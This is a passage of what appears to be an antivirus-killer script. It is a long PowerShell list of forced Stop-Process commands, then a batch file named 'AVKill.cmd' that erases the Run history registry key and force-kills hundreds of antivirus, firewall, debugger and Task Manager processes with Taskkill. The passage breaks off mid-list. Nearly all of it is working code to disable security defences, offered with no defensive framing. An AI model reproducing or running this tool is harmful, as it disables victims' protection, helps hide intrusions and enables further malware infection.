avgrsx.exe -Force Stop-Process -ProcessName avgserv.exe -Force Stop-Process -ProcessName avgserv9.exe -Force Stop-Process -ProcessName avguard.exe -Force Stop-Process -ProcessName avgw.exe -Force Stop-Process -ProcessName avkpop.exe -Force Stop-Process -ProcessName avkserv.exe -Force Stop-Process -ProcessName avkservice.exe -Force Stop-Process -ProcessName avkwctl9.exe -Force Stop-Process -ProcessName avltmain.exe -Force Stop-Process -ProcessName avnt.exe -Force Stop-Process -ProcessName avp.exe -Force Stop-Process -ProcessName avp.exe -Force Stop-Process -ProcessName avp32.exe -Force Stop-Process -ProcessName avpcc.exe -Force Stop-Process -ProcessName avpdos32.exe -Force Stop-Process -ProcessName avpm.exe -Force Stop-Process -ProcessName avptc32.exe -Force Stop-Process -ProcessName avpupd.exe -Force Stop-Process -ProcessName avsched32.exe -Force Stop-Process -ProcessName avsynmgr.exe -Force Stop-Process -ProcessName avwin.exe -Force Stop-Process -ProcessName avwin95.exe -Force Stop-Process -ProcessName avwinnt.exe -Force Stop-Process -ProcessName avwupd.exe -Force Stop-Process -ProcessName avwupd32.exe -Force Stop-Process -ProcessName avwupsrv.exe -Force Stop-Process -ProcessName avxmonitor9x.exe -Force Stop-Process -ProcessName avxmonitornt.exe -Force Stop-Process -ProcessName avxquar.exe -Force Stop-Process -ProcessName backweb.exe -Force Stop-Process -ProcessName bargains.exe -Force Stop-Process -ProcessName bd_professional.exe -Force Stop-Process -ProcessName beagle.exe -Force Stop-Process -ProcessName belt.exe -Force Stop-Process -ProcessName bidef.exe -Force Stop-Process -ProcessName bidserver.exe -Force Stop-Process -ProcessName bipcp.exe -Force Stop-Process -ProcessName bipcpevalsetup.exe -Force Stop-Process -ProcessName bisp.exe -Force Stop-Process -ProcessName blackd.exe -Force Stop-Process -ProcessName blackice.exe -Force Stop-Process -ProcessName blink.exe -Force Stop-Process -ProcessName blss.exe -Force Stop-Process -ProcessName bootconf.exe -Force Stop-Process -ProcessName bootwarn.exe -Force Stop-Process -ProcessName borg2.exe -Force Stop-Process -ProcessName bpc.exe -Force Stop-Process -ProcessName brasil.exe -Force Stop-Process -ProcessName bs120.exe -Force Stop-Process -ProcessName bundle.exe -Force Stop-Process -ProcessName bvt.exe -Force Stop-Process -ProcessName ccapp.exe -Force Stop-Process -ProcessName ccevtmgr.exe -Force Stop-Process -ProcessName ccpxysvc.exe -Force Stop-Process -ProcessName cdp.exe -Force Stop-Process -ProcessName cfd.exe -Force Stop-Process -ProcessName cfgwiz.exe -Force Stop-Process -ProcessName cfiadmin.exe -Force Stop-Process -ProcessName cfiaudit.exe -Force Stop-Process -ProcessName cfinet.exe -Force Stop-Process -ProcessName cfinet32.exe -Force Stop-Process -ProcessName claw95.exe -Force Stop-Process -ProcessName claw95cf.exe -Force Stop-Process -ProcessName clean.exe -Force Stop-Process -ProcessName cleaner.exe -Force Stop-Process -ProcessName cleaner3.exe -Force Stop-Process -ProcessName cleanpc.exe -Force Stop-Process -ProcessName click.exe -Force Stop-Process -ProcessName cmd.exe -Force Stop-Process -ProcessName cmd32.exe -Force Stop-Process -ProcessName cmesys.exe -Force Stop-Process -ProcessName cmgrdian.exe -Force Stop-Process -ProcessName cmon016.exe -Force Stop-Process -ProcessName connectionmonitor.exe -Force Stop-Process -ProcessName cpd.exe -Force Stop-Process -ProcessName cpf9x206.exe -Force Stop-Process -ProcessName cpfnt206.exe -Force Stop-Process -ProcessName ctrl.exe -Force Stop-Process -ProcessName cv.exe -Force Stop-Process -ProcessName cwnb181.exe -Force Stop-Process -ProcessName cwntdwmo.exe -Force Stop-Process -ProcessName datemanager.exe -Force Stop-Process -ProcessName dcomx.exe -Force Stop-Process -ProcessName defalert.exe -Force Stop-Process -ProcessName defscangui.exe -Force Stop-Process -ProcessName defwatch.exe -Force Stop-Process -ProcessName deputy.exe -Force Stop-Process -ProcessName divx.exe -Force Stop-Process -ProcessName dllcache.exe -Force Stop-Process -ProcessName dllreg.exe -Force Stop-Process -ProcessName doors.exe -Force Stop-Process -ProcessName dpf.exe -Force Stop-Process -ProcessName dpfsetup.exe -Force Stop-Process -ProcessName dpps2.exe -Force Stop-Process -ProcessName drwatson.exe -Force Stop-Process -ProcessName drweb32.exe -Force Stop-Process -ProcessName drwebupw.exe -Force Stop-Process -ProcessName dssagent.exe -Force Stop-Process -ProcessName dvp95.exe -Force Stop-Process -ProcessName dvp95_0.exe -Force Stop-Process -ProcessName ecengine.exe -Force Stop-Process -ProcessName efpeadm.exe -Force Stop-Process -ProcessName emsw.exe -Force Stop-Process -ProcessName ent.exe -Force Stop-Process -ProcessName esafe.exe -Force Stop-Process -ProcessName escanhnt.exe -Force Stop-Process -ProcessName escanv95.exe -Force Stop-Process -ProcessName espwatch.exe -Force Stop-Process -ProcessName ethereal.exe -Force Stop-Process -ProcessName etrustcipe.exe -Force Stop-Process -ProcessName evpn.exe -Force Stop-Process -ProcessName exantivirus-cnet.exe -Force Stop-Process -ProcessName exe.avxw.exe -Force Stop-Process -ProcessName expert.exe -Force Stop-Process -ProcessName explore.exe -Force Stop-Process -ProcessName f-agnt95.exe -Force Stop-Process -ProcessName f-prot.exe -Force Stop-Process -ProcessName f-prot95.exe -Force Stop-Process -ProcessName f-stopw.exe -Force Stop-Process -ProcessName fameh32.exe -Force Stop-Process -ProcessName fast.exe -Force Stop-Process -ProcessName fch32.exe -Force Stop-Process -ProcessName fih32.exe -Force Stop-Process -ProcessName findviru.exe -Force Stop-Process -ProcessName firewall.exe -Force Stop-Process -ProcessName fnrb32.exe -Force Stop-Process -ProcessName fp-win.exe -Force Stop-Process -ProcessName fp-win_trial.exe -Force Stop-Process -ProcessName fprot.exe -Force Stop-Process -ProcessName frw.exe -Force Stop-Process -ProcessName fsaa.exe -Force Stop-Process -ProcessName fsav.exe -Force Stop-Process -ProcessName fsav32.exe -Force Stop-Process -ProcessName fsav530stbyb.exe -Force Stop-Process -ProcessName fsav530wtbyb.exe -Force Stop-Process -ProcessName fsav95.exe -Force Stop-Process -ProcessName fsgk32.exe -Force Stop-Process -ProcessName fsm32.exe -Force Stop-Process -ProcessName fsma32.exe -Force Stop-Process -ProcessName fsmb32.exe -Force Stop-Process -ProcessName gator.exe -Force Stop-Process -ProcessName gbmenu.exe -Force Stop-Process -ProcessName gbpoll.exe -Force Stop-Process -ProcessName generics.exe -Force Stop-Process -ProcessName gmt.exe -Force Stop-Process -ProcessName guard.exe -Force Stop-Process -ProcessName guarddog.exe -Force Stop-Process -ProcessName hacktracersetup.exe -Force Stop-Process -ProcessName hbinst.exe -Force Stop-Process -ProcessName hbsrv.exe -Force Stop-Process -ProcessName hotactio.exe -Force Stop-Process -ProcessName hotpatch.exe -Force Stop-Process -ProcessName htlog.exe -Force Stop-Process -ProcessName htpatch.exe -Force Stop-Process -ProcessName hwpe.exe -Force Stop-Process -ProcessName hxdl.exe -Force Stop-Process -ProcessName hxiul.exe -Force Stop-Process -ProcessName iamapp.exe -Force Stop-Process -ProcessName iamserv.exe -Force Stop-Process -ProcessName iamstats.exe -Force Stop-Process -ProcessName ibmasn.exe -Force Stop-Process -ProcessName ibmavsp.exe -Force Stop-Process -ProcessName icload95.exe -Force Stop-Process -ProcessName icloadnt.exe -Force Stop-Process -ProcessName icmon.exe -Force Stop-Process -ProcessName icsupp95.exe -Force Stop-Process -ProcessName icsuppnt.exe -Force Stop-Process -ProcessName idle.exe -Force Stop-Process -ProcessName iedll.exe -Force Stop-Process -ProcessName iedriver.exe -Force Stop-Process -ProcessName iexplorer.exe -Force Stop-Process -ProcessName iface.exe -Force Stop-Process -ProcessName ifw2000.exe -Force Stop-Process -ProcessName inetlnfo.exe -Force Stop-Process -ProcessName infus.exe -Force Stop-Process -ProcessName infwin.exe -Force Stop-Process -ProcessName init.exe -Force Stop-Process -ProcessName intdel.exe -Force Stop-Process -ProcessName intren.exe -Force Stop-Process -ProcessName iomon98.exe -Force Stop-Process -ProcessName istsvc.exe -Force Stop-Process -ProcessName jammer.exe -Force Stop-Process -ProcessName jdbgmrg.exe -Force Stop-Process -ProcessName jedi.exe -Force Stop-Process -ProcessName kavlite40eng.exe -Force Stop-Process -ProcessName kavpers40eng.exe -Force Stop-Process -ProcessName kavpf.exe -Force Stop-Process -ProcessName kazza.exe -Force Stop-Process -ProcessName keenvalue.exe -Force Stop-Process -ProcessName kerio-pf-213-en-win.exe -Force Stop-Process -ProcessName kerio-wrl-421-en-win.exe -Force Stop-Process -ProcessName kerio-wrp-421-en-win.exe -Force Stop-Process -ProcessName kernel32.exe -Force Stop-Process -ProcessName killprocesssetup161.exe -Force Stop-Process -ProcessName launcher.exe -Force Stop-Process -ProcessName ldnetmon.exe -Force Stop-Process -ProcessName ldpro.exe -Force Stop-Process -ProcessName ldpromenu.exe -Force Stop-Process -ProcessName ldscan.exe -Force Stop-Process -ProcessName lnetinfo.exe -Force Stop-Process -ProcessName loader.exe -Force Stop-Process -ProcessName localnet.exe -Force Stop-Process -ProcessName lockdown.exe -Force Stop-Process -ProcessName lockdown2000.exe -Force Stop-Process -ProcessName lookout.exe -Force Stop-Process -ProcessName lordpe.exe -Force Stop-Process -ProcessName lsetup.exe -Force Stop-Process -ProcessName luall.exe -Force Stop-Process -ProcessName luau.exe -Force Stop-Process -ProcessName lucomserver.exe -Force Stop-Process -ProcessName luinit.exe -Force Stop-Process -ProcessName luspt.exe -Force Stop-Process -ProcessName mapisvc32.exe -Force Stop-Process -ProcessName mcagent.exe -Force Stop-Process -ProcessName mcmnhdlr.exe -Force Stop-Process -ProcessName mcshield.exe -Force Stop-Process -ProcessName mctool.exe -Force Stop-Process -ProcessName mcupdate.exe -Force Stop-Process -ProcessName mcvsrte.exe -Force Stop-Process -ProcessName mcvsshld.exe -Force Stop-Process -ProcessName md.exe -Force Stop-Process -ProcessName mfin32.exe -Force Stop-Process -ProcessName mfw2en.exe -Force Stop-Process -ProcessName mfweng3.02d30.exe -Force Stop-Process -ProcessName mgavrtcl.exe -Force Stop-Process -ProcessName mgavrte.exe -Force Stop-Process -ProcessName mghtml.exe -Force Stop-Process -ProcessName mgui.exe -Force Stop-Process -ProcessName minilog.exe -Force Stop-Process -ProcessName mmod.exe -Force Stop-Process -ProcessName monitor.exe -Force Stop-Process -ProcessName moolive.exe -Force Stop-Process -ProcessName mostat.exe -Force Stop-Process -ProcessName mpfagent.exe -Force Stop-Process -ProcessName mpfservice.exe -Force Stop-Process -ProcessName mpftray.exe -Force Stop-Process -ProcessName mrflux.exe -Force Stop-Process -ProcessName msapp.exe -Force Stop-Process -ProcessName msbb.exe -Force Stop-Process -ProcessName msblast.exe -Force Stop-Process -ProcessName mscache.exe -Force Stop-Process -ProcessName msccn32.exe -Force Stop-Process -ProcessName mscman.exe -Force Stop-Process -ProcessName msconfig.exe -Force Stop-Process -ProcessName msdm.exe -Force Stop-Process -ProcessName msdos.exe -Force Stop-Process -ProcessName msiexec16.exe -Force Stop-Process -ProcessName msinfo32.exe -Force Stop-Process -ProcessName mslaugh.exe -Force Stop-Process -ProcessName msmgt.exe -Force Stop-Process -ProcessName msmsgri32.exe -Force Stop-Process -ProcessName mssmmc32.exe -Force Stop-Process -ProcessName mssys.exe -Force Stop-Process -ProcessName msvxd.exe -Force Stop-Process -ProcessName mu0311ad.exe -Force Stop-Process -ProcessName mwatch.exe -Force Stop-Process -ProcessName n32scanw.exe -Force Stop-Process -ProcessName nav.exe -Force Stop-Process -ProcessName navap.navapsvc.exe -Force Stop-Process -ProcessName navapsvc.exe -Force Stop-Process -ProcessName navapw32.exe -Force Stop-Process -ProcessName navdx.exe -Force Stop-Process -ProcessName navlu32.exe -Force Stop-Process -ProcessName navnt.exe -Force Stop-Process -ProcessName navstub.exe -Force Stop-Process -ProcessName navw32.exe -Force Stop-Process -ProcessName navwnt.exe -Force Stop-Process -ProcessName nc2000.exe -Force Stop-Process -ProcessName ncinst4.exe -Force Stop-Process -ProcessName ndd32.exe -Force Stop-Process -ProcessName neomonitor.exe -Force Stop-Process -ProcessName neowatchlog.exe -Force Stop-Process -ProcessName netarmor.exe -Force Stop-Process -ProcessName netd32.exe -Force Stop-Process -ProcessName netinfo.exe -Force Stop-Process -ProcessName netmon.exe -Force Stop-Process -ProcessName netscanpro.exe -Force Stop-Process -ProcessName netspyhunter-1.2.exe -Force Stop-Process -ProcessName netstat.exe -Force Stop-Process -ProcessName netutils.exe -Force Stop-Process -ProcessName nisserv.exe -Force Stop-Process -ProcessName nisum.exe -Force Stop-Process -ProcessName nmain.exe -Force Stop-Process -ProcessName nod32.exe -Force Stop-Process -ProcessName normist.exe -Force Stop-Process -ProcessName norton_internet_secu_3.0_407.exe -Force Stop-Process -ProcessName notstart.exe -Force Stop-Process -ProcessName npf40_tw_98_nt_me_2k.exe -Force Stop-Process -ProcessName npfmessenger.exe -Force Stop-Process -ProcessName nprotect.exe -Force Stop-Process -ProcessName npscheck.exe -Force Stop-Process -ProcessName npssvc.exe -Force Stop-Process -ProcessName nsched32.exe -Force Stop-Process -ProcessName nssys32.exe -Force Stop-Process -ProcessName nstask32.exe -Force Stop-Process -ProcessName nsupdate.exe -Force Stop-Process -ProcessName nt.exe -Force Stop-Process -ProcessName ntrtscan.exe -Force Stop-Process -ProcessName ntvdm.exe -Force Stop-Process -ProcessName ntxconfig.exe -Force Stop-Process -ProcessName nui.exe -Force Stop-Process -ProcessName nupgrade.exe -Force Stop-Process -ProcessName nvarch16.exe -Force Stop-Process -ProcessName nvc95.exe -Force Stop-Process -ProcessName nvsvc32.exe -Force Stop-Process -ProcessName nwinst4.exe -Force Stop-Process -ProcessName nwservice.exe -Force Stop-Process -ProcessName nwtool16.exe -Force Stop-Process -ProcessName ollydbg.exe -Force Stop-Process -ProcessName onsrvr.exe -Force Stop-Process -ProcessName optimize.exe -Force Stop-Process -ProcessName ostronet.exe -Force Stop-Process -ProcessName otfix.exe -Force Stop-Process -ProcessName outpost.exe -Force Stop-Process -ProcessName outpostinstall.exe -Force Stop-Process -ProcessName outpostproinstall.exe -Force Stop-Process -ProcessName padmin.exe -Force Stop-Process -ProcessName panixk.exe -Force Stop-Process -ProcessName patch.exe -Force Stop-Process -ProcessName pavcl.exe -Force Stop-Process -ProcessName pavproxy.exe -Force Stop-Process -ProcessName pavsched.exe -Force Stop-Process -ProcessName pavw.exe -Force Stop-Process -ProcessName pccwin98.exe -Force Stop-Process -ProcessName pcfwallicon.exe -Force Stop-Process -ProcessName pcip10117_0.exe -Force Stop-Process -ProcessName pcscan.exe -Force Stop-Process -ProcessName pdsetup.exe -Force Stop-Process -ProcessName periscope.exe -Force Stop-Process -ProcessName persfw.exe -Force Stop-Process -ProcessName perswf.exe -Force Stop-Process -ProcessName pf2.exe -Force Stop-Process -ProcessName pfwadmin.exe -Force Stop-Process -ProcessName pgmonitr.exe -Force Stop-Process -ProcessName pingscan.exe -Force Stop-Process -ProcessName platin.exe -Force Stop-Process -ProcessName pop3trap.exe -Force Stop-Process -ProcessName poproxy.exe -Force Stop-Process -ProcessName popscan.exe -Force Stop-Process -ProcessName portdetective.exe -Force Stop-Process -ProcessName portmonitor.exe -Force Stop-Process -ProcessName powerscan.exe -Force Stop-Process -ProcessName ppinupdt.exe -Force Stop-Process -ProcessName pptbc.exe -Force Stop-Process -ProcessName ppvstop.exe -Force Stop-Process -ProcessName prizesurfer.exe -Force Stop-Process -ProcessName prmt.exe -Force Stop-Process -ProcessName prmvr.exe -Force Stop-Process -ProcessName procdump.exe -Force Stop-Process -ProcessName processmonitor.exe -Force Stop-Process -ProcessName procexplorerv1.0.exe -Force Stop-Process -ProcessName programauditor.exe -Force Stop-Process -ProcessName proport.exe -Force Stop-Process -ProcessName protectx.exe -Force Stop-Process -ProcessName pspf.exe -Force Stop-Process -ProcessName purge.exe -Force Stop-Process -ProcessName qconsole.exe -Force Stop-Process -ProcessName qserver.exe -Force Stop-Process -ProcessName rapapp.exe -Force Stop-Process -ProcessName rav7.exe -Force Stop-Process -ProcessName rav7win.exe -Force Stop-Process -ProcessName rav8win32eng.exe -Force Stop-Process -ProcessName ray.exe -Force Stop-Process -ProcessName rb32.exe -Force Stop-Process -ProcessName rcsync.exe -Force Stop-Process -ProcessName realmon.exe -Force Stop-Process -ProcessName reged.exe -Force Stop-Process -ProcessName regedit.exe -Force Stop-Process -ProcessName regedt32.exe -Force Stop-Process -ProcessName rescue.exe -Force Stop-Process -ProcessName rescue32.exe -Force Stop-Process -ProcessName rrguard.exe -Force Stop-Process -ProcessName rshell.exe -Force Stop-Process -ProcessName rtvscan.exe -Force Stop-Process -ProcessName rtvscn95.exe -Force Stop-Process -ProcessName rulaunch.exe -Force Stop-Process -ProcessName run32dll.exe -Force Stop-Process -ProcessName rundll.exe -Force Stop-Process -ProcessName rundll16.exe -Force Stop-Process -ProcessName ruxdll32.exe -Force Stop-Process -ProcessName safeweb.exe -Force Stop-Process -ProcessName sahagent.exe -Force Stop-Process -ProcessName save.exe -Force Stop-Process -ProcessName savenow.exe -Force Stop-Process -ProcessName sbserv.exe -Force Stop-Process -ProcessName sc.exe -Force Stop-Process -ProcessName scam32.exe -Force Stop-Process -ProcessName scan32.exe -Force Stop-Process -ProcessName scan95.exe -Force Stop-Process -ProcessName scanpm.exe -Force Stop-Process -ProcessName scrscan.exe -Force Stop-Process -ProcessName serv95.exe -Force Stop-Process -ProcessName setup_flowprotector_us.exe -Force Stop-Process -ProcessName setupvameeval.exe -Force Stop-Process -ProcessName sfc.exe -Force Stop-Process -ProcessName sgssfw32.exe -Force Stop-Process -ProcessName sh.exe -Force Stop-Process -ProcessName shellspyinstall.exe -Force Stop-Process -ProcessName shn.exe -Force Stop-Process -ProcessName showbehind.exe -Force Stop-Process -ProcessName smc.exe -Force Stop-Process -ProcessName sms.exe -Force Stop-Process -ProcessName smss32.exe -Force Stop-Process -ProcessName soap.exe -Force Stop-Process -ProcessName sofi.exe -Force Stop-Process -ProcessName sperm.exe -Force Stop-Process -ProcessName spf.exe -Force Stop-Process -ProcessName sphinx.exe -Force Stop-Process -ProcessName spoler.exe -Force Stop-Process -ProcessName spoolcv.exe -Force Stop-Process -ProcessName spoolsv32.exe -Force Stop-Process -ProcessName spyxx.exe -Force Stop-Process -ProcessName srexe.exe -Force Stop-Process -ProcessName srng.exe -Force Stop-Process -ProcessName ss3edit.exe -Force Stop-Process -ProcessName ssg_4104.exe -Force Stop-Process -ProcessName ssgrate.exe -Force Stop-Process -ProcessName st2.exe -Force Stop-Process -ProcessName start.exe -Force Stop-Process -ProcessName stcloader.exe -Force Stop-Process -ProcessName supftrl.exe -Force Stop-Process -ProcessName support.exe -Force Stop-Process -ProcessName supporter5.exe -Force Stop-Process -ProcessName svc.exe -Force Stop-Process -ProcessName svchostc.exe -Force Stop-Process -ProcessName svchosts.exe -Force Stop-Process -ProcessName svshost.exe -Force Stop-Process -ProcessName sweep95.exe -Force Stop-Process -ProcessName sweepnet.sweepsrv.sys.swnetsup.exe -Force Stop-Process -ProcessName symproxysvc.exe -Force Stop-Process -ProcessName symtray.exe -Force Stop-Process -ProcessName sysedit.exe -Force Stop-Process -ProcessName system.exe -Force Stop-Process -ProcessName system32.exe -Force Stop-Process -ProcessName sysupd.exe -Force Stop-Process -ProcessName taskmg.exe -Force Stop-Process -ProcessName taskmgr.exe -Force Stop-Process -ProcessName taskmo.exe -Force Stop-Process -ProcessName taskmon.exe -Force Stop-Process -ProcessName taumon.exe -Force Stop-Process -ProcessName tbscan.exe -Force Stop-Process -ProcessName tc.exe -Force Stop-Process -ProcessName tca.exe -Force Stop-Process -ProcessName tcm.exe -Force Stop-Process -ProcessName tds-3.exe -Force Stop-Process -ProcessName tds2-98.exe -Force Stop-Process -ProcessName tds2-nt.exe -Force Stop-Process -ProcessName teekids.exe -Force Stop-Process -ProcessName tfak.exe -Force Stop-Process -ProcessName tfak5.exe -Force Stop-Process -ProcessName tgbob.exe -Force Stop-Process -ProcessName titanin.exe -Force Stop-Process -ProcessName titaninxp.exe -Force Stop-Process -ProcessName tracert.exe -Force Stop-Process -ProcessName trickler.exe -Force Stop-Process -ProcessName trjscan.exe -Force Stop-Process -ProcessName trjsetup.exe -Force Stop-Process -ProcessName trojantrap3.exe -Force Stop-Process -ProcessName tsadbot.exe -Force Stop-Process -ProcessName tvmd.exe -Force Stop-Process -ProcessName tvtmd.exe -Force Stop-Process -ProcessName undoboot.exe -Force Stop-Process -ProcessName updat.exe -Force Stop-Process -ProcessName update.exe -Force Stop-Process -ProcessName upgrad.exe -Force Stop-Process -ProcessName utpost.exe -Force Stop-Process -ProcessName vbcmserv.exe -Force Stop-Process -ProcessName vbcons.exe -Force Stop-Process -ProcessName vbust.exe -Force Stop-Process -ProcessName vbwin9x.exe -Force Stop-Process -ProcessName vbwinntw.exe -Force Stop-Process -ProcessName vcsetup.exe -Force Stop-Process -ProcessName vet32.exe -Force Stop-Process -ProcessName vet95.exe -Force Stop-Process -ProcessName vettray.exe -Force Stop-Process -ProcessName vfsetup.exe -Force Stop-Process -ProcessName vir-help.exe -Force Stop-Process -ProcessName virusmdpersonalfirewall.exe -Force Stop-Process -ProcessName vnlan300.exe -Force Stop-Process -ProcessName vnpc3000.exe -Force Stop-Process -ProcessName vpc32.exe -Force Stop-Process -ProcessName vpc42.exe -Force Stop-Process -ProcessName vpfw30s.exe -Force Stop-Process -ProcessName vptray.exe -Force Stop-Process -ProcessName vscan40.exe -Force Stop-Process -ProcessName vscenu6.02d30.exe -Force Stop-Process -ProcessName vsched.exe -Force Stop-Process -ProcessName vsecomr.exe -Force Stop-Process -ProcessName vshwin32.exe -Force Stop-Process -ProcessName vsisetup.exe -Force Stop-Process -ProcessName vsmain.exe -Force Stop-Process -ProcessName vsmon.exe -Force Stop-Process -ProcessName vsstat.exe -Force Stop-Process -ProcessName vswin9xe.exe -Force Stop-Process -ProcessName vswinntse.exe -Force Stop-Process -ProcessName vswinperse.exe -Force Stop-Process -ProcessName w32dsm89.exe -Force Stop-Process -ProcessName w9x.exe -Force Stop-Process -ProcessName watchdog.exe -Force Stop-Process -ProcessName webdav.exe -Force Stop-Process -ProcessName webscanx.exe -Force Stop-Process -ProcessName webtrap.exe -Force Stop-Process -ProcessName wfindv32.exe -Force Stop-Process -ProcessName whoswatchingme.exe -Force Stop-Process -ProcessName wimmun32.exe -Force Stop-Process -ProcessName win-bugsfix.exe -Force Stop-Process -ProcessName win32.exe -Force Stop-Process -ProcessName win32us.exe -Force Stop-Process -ProcessName winactive.exe -Force Stop-Process -ProcessName window.exe -Force Stop-Process -ProcessName windows.exe -Force Stop-Process -ProcessName wininetd.exe -Force Stop-Process -ProcessName wininitx.exe -Force Stop-Process -ProcessName winlogin.exe -Force Stop-Process -ProcessName winmain.exe -Force Stop-Process -ProcessName winnet.exe -Force Stop-Process -ProcessName winppr32.exe -Force Stop-Process -ProcessName winrecon.exe -Force Stop-Process -ProcessName winservn.exe -Force Stop-Process -ProcessName winssk32.exe -Force Stop-Process -ProcessName winstart.exe -Force Stop-Process -ProcessName winstart001.exe -Force Stop-Process -ProcessName wintsk32.exe -Force Stop-Process -ProcessName winupdate.exe -Force Stop-Process -ProcessName wkufind.exe -Force Stop-Process -ProcessName wnad.exe -Force Stop-Process -ProcessName wnt.exe -Force Stop-Process -ProcessName wradmin.exe -Force Stop-Process -ProcessName wrctrl.exe -Force Stop-Process -ProcessName wsbgate.exe -Force Stop-Process -ProcessName wupdater.exe -Force Stop-Process -ProcessName wupdt.exe -Force Stop-Process -ProcessName wyvernworksfirewall.exe -Force Stop-Process -ProcessName xpf202en.exe -Force Stop-Process -ProcessName zapro.exe -Force Stop-Process -ProcessName zapsetup3001.exe -Force Stop-Process -ProcessName zatutor.exe -Force Stop-Process -ProcessName zonalm2601.exe -Force Stop-Process -ProcessName zonealarm.exe -Force OR AVKill.cmd @echo off cls REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f Taskkill /T /F /IM AAWTray.exe /IM Ad-Aware.exe /IM MSASCui.exe /IM _avp32.exe /IM _avpcc.exe /IM _avpm.exe /IM aAvgApi.exe /IM ackwin32.exe /IM adaware.exe /IM advxdwin.exe Taskkill /T /F /IM agentsvr.exe /IM agentw.exe /IM alertsvc.exe /IM alevir.exe /IM alogserv.exe /IM amon9x.exe /IM anti-trojan.exe /IM antivirus.exe /IM ants.exe /IM apimonitor.exe Taskkill /T /F /IM aplica32.exe /IM apvxdwin.exe /IM arr.exe /IM atcon.exe /IM atguard.exe /IM atro55en.exe /IM atupdater.exe /IM atwatch.exe /IM au.exe /IM aupdate.exe Taskkill /T /F /IM auto-protect.nav80try.exe /IM autodown.exe /IM autotrace.exe /IM autoupdate.exe /IM avconsol.exe /IM ave32.exe /IM avgcc32.exe /IM avgctrl.exe /IM avgemc.exe Taskkill /T /F /IM avgnt.exe /IM avgrsx.exe /IM avgserv.exe /IM avgserv9.exe /IM avguard.exe /IM avgw.exe /IM avkpop.exe /IM avkserv.exe /IM avkservice.exe /IM avkwctl9.exe Taskkill /T /F /IM avltmain.exe /IM avnt.exe /IM avp.exe /IM avp.exe /IM avp32.exe /IM avpcc.exe /IM avpdos32.exe /IM avpm.exe /IM avptc32.exe /IM avpupd.exe /IM avsched32.exe Taskkill /T /F /IM avsynmgr.exe /IM avwin.exe /IM avwin95.exe /IM avwinnt.exe /IM avwupd.exe /IM avwupd32.exe /IM avwupsrv.exe /IM avxmonitor9x.exe /IM avxmonitornt.exe Taskkill /T /F /IM avxquar.exe /IM backweb.exe /IM bargains.exe /IM bd_professional.exe /IM beagle.exe /IM belt.exe /IM bidef.exe /IM bidserver.exe /IM bipcp.exe /IM bipcpevalsetup.exe Taskkill /T /F /IM bisp.exe /IM blackd.exe /IM blackice.exe /IM blink.exe /IM blss.exe /IM bootconf.exe /IM bootwarn.exe /IM borg2.exe /IM bpc.exe /IM brasil.exe /IM bs120.exe Taskkill /T /F /IM bundle.exe /IM bvt.exe /IM ccapp.exe /IM ccevtmgr.exe /IM ccpxysvc.exe /IM cdp.exe /IM cfd.exe /IM cfgwiz.exe /IM cfiadmin.exe /IM cfiaudit.exe /IM cfinet.exe Taskkill /T /F /IM cfinet32.exe /IM claw95.exe /IM claw95cf.exe /IM clean.exe /IM cleaner.exe /IM cleaner3.exe /IM cleanpc.exe /IM click.exe /IM cmesys.exe Taskkill /T /F /IM cmgrdian.exe /IM cmon016.exe /IM connectionmonitor.exe /IM cpd.exe /IM cpf9x206.exe /IM cpfnt206.exe /IM ctrl.exe /IM cv.exe /IM cwnb181.exe /IM cwntdwmo.exe Taskkill /T /F /IM datemanager.exe /IM dcomx.exe /IM defalert.exe /IM defscangui.exe /IM defwatch.exe /IM deputy.exe /IM divx.exe /IM dllcache.exe /IM dllreg.exe /IM doors.exe Taskkill /T /F /IM dpf.exe /IM dpfsetup.exe /IM dpps2.exe /IM drwatson.exe /IM drweb32.exe /IM drwebupw.exe /IM dssagent.exe /IM dvp95.exe /IM dvp95_0.exe /IM ecengine.exe Taskkill /T /F /IM efpeadm.exe /IM emsw.exe /IM ent.exe /IM esafe.exe /IM escanhnt.exe /IM escanv95.exe /IM espwatch.exe /IM ethereal.exe /IM etrustcipe.exe /IM evpn.exe Taskkill /T /F /IM exantivirus-cnet.exe /IM exe.avxw.exe /IM expert.exe /IM explore.exe /IM f-agnt95.exe /IM f-prot.exe /IM f-prot95.exe /IM f-stopw.exe /IM fameh32.exe /IM fast.exe Taskkill /T /F /IM fch32.exe /IM fih32.exe /IM findviru.exe /IM firewall.exe /IM fnrb32.exe /IM fp-win.exe /IM fp-win_trial.exe /IM fprot.exe /IM frw.exe /IM fsaa.exe /IM fsav.exe Taskkill /T /F /IM fsav32.exe /IM fsav530stbyb.exe /IM fsav530wtbyb.exe /IM fsav95.exe /IM fsgk32.exe /IM fsm32.exe /IM fsma32.exe /IM fsmb32.exe /IM gator.exe /IM gbmenu.exe Taskkill /T /F /IM gbpoll.exe /IM generics.exe /IM gmt.exe /IM guard.exe /IM guarddog.exe /IM hacktracersetup.exe /IM hbinst.exe /IM hbsrv.exe /IM hotactio.exe /IM hotpatch.exe Taskkill /T /F /IM htlog.exe /IM htpatch.exe /IM hwpe.exe /IM hxdl.exe /IM hxiul.exe /IM iamapp.exe /IM iamserv.exe /IM iamstats.exe /IM ibmasn.exe /IM ibmavsp.exe /IM icload95.exe Taskkill /T /F /IM icloadnt.exe /IM icmon.exe /IM icsupp95.exe /IM icsuppnt.exe /IM idle.exe /IM iedll.exe /IM iedriver.exe /IM iexplorer.exe /IM iface.exe /IM ifw2000.exe Taskkill /T /F /IM inetlnfo.exe /IM infus.exe /IM infwin.exe /IM init.exe /IM intdel.exe /IM intren.exe /IM iomon98.exe /IM istsvc.exe /IM jammer.exe /IM jdbgmrg.exe /IM jedi.exe Taskkill /T /F /IM kavlite40eng.exe /IM kavpers40eng.exe /IM kavpf.exe /IM kazza.exe /IM keenvalue.exe /IM kerio-pf-213-en-win.exe /IM kerio-wrl-421-en-win.exe /IM kerio-wrp-421-en-win.exe Taskkill /T /F /IM kernel32.exe /IM killprocesssetup161.exe /IM launcher.exe /IM ldnetmon.exe /IM ldpro.exe /IM ldpromenu.exe /IM ldscan.exe /IM lnetinfo.exe /IM loader.exe Taskkill /T /F /IM localnet.exe /IM lockdown.exe /IM lockdown2000.exe /IM lookout.exe /IM lordpe.exe /IM lsetup.exe /IM luall.exe /IM luau.exe /IM lucomserver.exe /IM luinit.exe Taskkill /T /F /IM luspt.exe /IM mapisvc32.exe /IM mcagent.exe /IM mcmnhdlr.exe /IM mcshield.exe /IM mctool.exe /IM mcupdate.exe /IM mcvsrte.exe /IM mcvsshld.exe /IM md.exe Taskkill /T /F /IM mfin32.exe /IM mfw2en.exe 